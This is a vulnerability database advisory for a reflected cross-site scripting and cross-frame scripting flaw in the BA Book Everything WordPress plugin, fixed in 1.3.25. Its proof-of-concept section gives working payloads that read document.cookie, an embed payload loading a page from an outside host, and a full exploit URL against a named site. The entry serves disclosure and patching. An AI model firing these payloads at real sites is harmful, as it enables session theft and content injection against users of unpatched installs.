BA Book Everything < 1.3.25 – Unauthenticated Reflected XSS & XFS | Plugin Vulnerabilities

Description

An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the BA Book Everything plugin v1.3.24 for WordPress.

Vulnerable parameter(s): date_from, date_to.

Proof of Concept

[$] :: Payloads:

"><!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//">
"><embed src=//ex-mi.ru/payload/xfsii.html></embed>

[!] :: PoC:

https://ba-booking.com/ba-book-everything/search-result/?date_from=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);//%22%3E&date_to=%22%3E%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.domain);//%22%3E

Affects Plugins

ba-book-everything

Fixed in 1.3.25

References

URL

https://ex-mi.ru/exploit/[2020-09-30]-[WordPress]-ba-book-everything-plugin-v1.3.24.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website

https://ex-mi.ru

Verified

Yes

WPVDB ID

4d39c92c-067c-49f5-a157-3b5dcb820df9

Timeline

Publicly Published

2020-11-12 (about 5 years ago)

Added

2020-11-12 (about 5 years ago)

Last Updated

2020-11-14 (about 5 years ago)

Other

Published

Title

Published

2025-10-29

Title

Jannah < 7.6.1 - Unauthenticated Stored Cross-Site Scripting

Published

2023-11-17

Title

Biteship for WooCommerce < 2.2.25 - Reflected Cross-Site Scripting

Published

2024-03-07

Title

Premium Addons PRO < 2.9.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via Global Badge Module

Published

2021-10-06

Title

Formidable Form Builder < 5.0.07 - Admin+ Stored Cross-Site Scripting

Published

2025-04-24

Title

Mixcloud Embed <= 2.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting